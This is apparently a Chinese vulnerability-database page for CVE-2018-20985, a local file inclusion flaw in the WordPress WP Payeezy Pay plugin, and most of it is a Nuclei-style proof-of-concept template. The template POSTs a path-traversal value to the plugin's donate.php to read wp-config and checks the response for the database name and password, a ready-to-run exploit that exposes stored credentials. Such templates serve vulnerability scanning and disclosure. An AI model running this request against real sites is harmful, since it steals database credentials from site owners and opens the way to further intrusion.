CVE-2018-20985: WordPress Payeezy Pay <=2.97 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Payeezy Pay | POC: 已公开

漏洞描述

WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.

PoC代码[已公开]

id: CVE-2018-20985

info:
  name: WordPress Payeezy Pay <=2.97 - Local File Inclusion
  author: daffainfo
  severity: critical
  description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
  impact: |
    The vulnerability allows an attacker to include local files and execute arbitrary code on the server.
  remediation: |
    Update to the latest version of WordPress Payeezy Pay plugin.
  reference:
    - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
    - https://wordpress.org/plugins/wp-payeezy-pay/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2018-20985
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-20985
    cwe-id: CWE-20
    epss-score: 0.42918
    epss-percentile: 0.97406
    cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: payeezy
    product: wp_payeezy_pay
    framework: wordpress
  tags: cve,cve2018,wordpress,lfi,plugin,payeezy

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"

    body: "x_login=../../../wp-config"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "The base configuration for WordPress"
          - "define( 'DB_NAME',"
          - "define( 'DB_PASSWORD',"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cc924f353f7241db075c91f076d8ea1fa0308e787b184a7eb1aa8498f7c34e550220289ff3fa7f20368ced7f719fee922b15b129cd175abd1930b7f44978db7dcf81:922c64590222798bb761d5b6d8e72950

相关漏洞推荐